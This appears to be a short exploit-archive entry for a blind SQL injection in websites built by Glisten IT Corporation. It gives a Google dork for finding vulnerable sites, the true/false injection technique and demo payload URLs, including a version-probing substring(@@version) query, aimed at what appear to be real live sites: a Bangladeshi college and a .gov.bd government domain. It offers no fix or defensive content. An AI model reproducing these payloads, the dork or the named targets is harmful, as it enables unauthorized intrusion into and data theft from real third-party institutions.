********************************************************* #Exploit Title: Glisten IT Corporation - Blind Sql Injection Vulnerability #Date: 2024-12-05 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by: Glisten IT Corporation" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://jadc.edu.bd/single.php?id=1%27%20and%20true--+ * https://jadc.edu.bd/single.php?id=1%27%20and%20false--+ * https://jadc.edu.bd/single.php?id=1%27%20and%20substring(@@version,1,1)=1--+ ### Demo 2: * https://www.rrdhs.gov.bd/home/details.php?id=96%20and%20true-- * https://www.rrdhs.gov.bd/home/details.php?id=96%20and%20false-- * https://www.rrdhs.gov.bd/home/details.php?id=96%20and%20substring(@@version,1,1)=1-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************